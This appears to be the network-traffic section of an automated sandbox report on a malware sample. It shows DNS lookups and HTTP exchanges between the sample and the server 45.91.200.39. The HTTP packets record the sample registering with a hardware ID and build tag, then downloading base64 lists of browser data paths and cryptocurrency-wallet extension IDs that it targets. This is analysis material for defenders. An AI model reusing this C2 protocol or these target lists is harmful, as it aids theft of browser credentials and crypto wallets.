Oct 30, 2024 19:47:19.828114986 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.828160048 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.828166962 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.828206062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.828423977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.828438044 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.828486919 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.828493118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.828528881 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.829319000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829334021 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829381943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.829387903 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829421043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.829749107 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829767942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829806089 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.829813004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.829828024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.829843998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.830498934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.830513000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.830575943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.830583096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.830620050 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.830984116 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831039906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831208944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831267118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831274033 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831285000 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831316948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831322908 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831331968 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831376076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831753016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831774950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831809998 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831815958 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.831829071 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.831847906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.832818985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.832839012 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.832880974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.832887888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.832909107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.832921982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.833128929 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.833158016 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.833184958 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.833190918 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.833214045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.833231926 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.833971024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.833982944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834033012 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834039927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834055901 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834085941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834273100 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834287882 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834336042 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834343910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834386110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834532022 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834546089 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834587097 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.834595919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.834640026 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.863626003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.863728046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.863739014 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.863744020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:19.863786936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.864346981 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:19.864367962 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:20.356194019 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:20.356453896 CET	49738	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:20.364886999 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:20.365552902 CET	80	49738	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:20.365618944 CET	49738	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:20.365736961 CET	49738	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:20.380696058 CET	80	49738	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:22.843914986 CET	80	49738	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:22.844033957 CET	49738	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:27.976875067 CET	80	49738	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:27.976943016 CET	49738	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:41.432807922 CET	49738	80	192.168.2.4	45.91.200.39

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 19:47:09.325018883 CET	51517	53	192.168.2.4	1.1.1.1
Oct 30, 2024 19:47:09.362833023 CET	53	51517	1.1.1.1	192.168.2.4
Oct 30, 2024 19:47:31.657464981 CET	53	61235	162.159.36.2	192.168.2.4
Oct 30, 2024 19:47:32.292314053 CET	50676	53	192.168.2.4	1.1.1.1
Oct 30, 2024 19:47:32.301060915 CET	53	50676	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 19:47:09.325018883 CET	192.168.2.4	1.1.1.1	0xfb15	Standard query (0)	gosp.clinicavertigen.com	A (IP address)	IN (0x0001)	false
Oct 30, 2024 19:47:32.292314053 CET	192.168.2.4	1.1.1.1	0xc5e3	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 19:47:09.362833023 CET	1.1.1.1	192.168.2.4	0xfb15	No error (0)	gosp.clinicavertigen.com		87.106.236.48	A (IP address)	IN (0x0001)	false
Oct 30, 2024 19:47:32.301060915 CET	1.1.1.1	192.168.2.4	0xc5e3	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

gosp.clinicavertigen.com

45.91.200.39

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	45.91.200.39	80	6556	C:\Users\user\Desktop\b4s45TboUL.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 19:46:59.510721922 CET	87	OUT	GET / HTTP/1.1 Host: 45.91.200.39 Connection: Keep-Alive Cache-Control: no-cache
Oct 30, 2024 19:47:00.326957941 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:00.330980062 CET	416	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB Host: 45.91.200.39 Content-Length: 217 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--
Oct 30, 2024 19:47:00.667704105 CET	407	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 45 31 59 54 42 6c 4e 47 4e 6d 4e 7a 67 32 5a 44 59 77 4e 57 51 34 4d 7a 4a 69 4f 57 55 32 5a 6d 55 34 4d 57 4e 6c 5a 44 6b 30 4d 7a 68 6d 5a 47 4e 6c 4d 54 67 7a 4d 6a 59 78 4d 32 55 35 4e 54 42 6a 4e 54 59 78 4d 32 45 77 4f 44 59 77 5a 54 51 7a 4d 54 68 6b 5a 6a 56 68 4e 6a 6b 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NjE1YTBlNGNmNzg2ZDYwNWQ4MzJiOWU2ZmU4MWNlZDk0MzhmZGNlMTgzMjYxM2U5NTBjNTYxM2EwODYwZTQzMThkZjVhNjk4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 30, 2024 19:47:00.678425074 CET	467	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBF Host: 45.91.200.39 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 49 44 41 41 45 48 49 45 47 43 42 46 49 44 42 46 2d 2d 0d 0a Data Ascii: ------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------DBKFIDAAEHIEGCBFIDBFContent-Disposition: form-data; name="message"browsers------DBKFIDAAEHIEGCBFIDBF--
Oct 30, 2024 19:47:00.914757967 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 30, 2024 19:47:00.914849997 CET	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 30, 2024 19:47:00.939768076 CET	466	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFII Host: 45.91.200.39 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 2d 2d 0d 0a Data Ascii: ------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JKFHIIEHIEGDHJJJKFIIContent-Disposition: form-data; name="message"plugins------JKFHIIEHIEGDHJJJKFII--
Oct 30, 2024 19:47:01.176774025 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 30, 2024 19:47:01.176826000 CET	212	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8
Oct 30, 2024 19:47:01.176884890 CET	1236	IN	Data Raw: 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 Data Ascii: ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZ
Oct 30, 2024 19:47:01.176920891 CET	1236	IN	Data Raw: 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d Data Ascii: dHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGp
Oct 30, 2024 19:47:01.176955938 CET	1236	IN	Data Raw: 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 Data Ascii: bmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGh
Oct 30, 2024 19:47:01.176991940 CET	1236	IN	Data Raw: 64 57 78 30 66 47 6c 6e 61 33 42 6a 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 Data Ascii: dWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWp
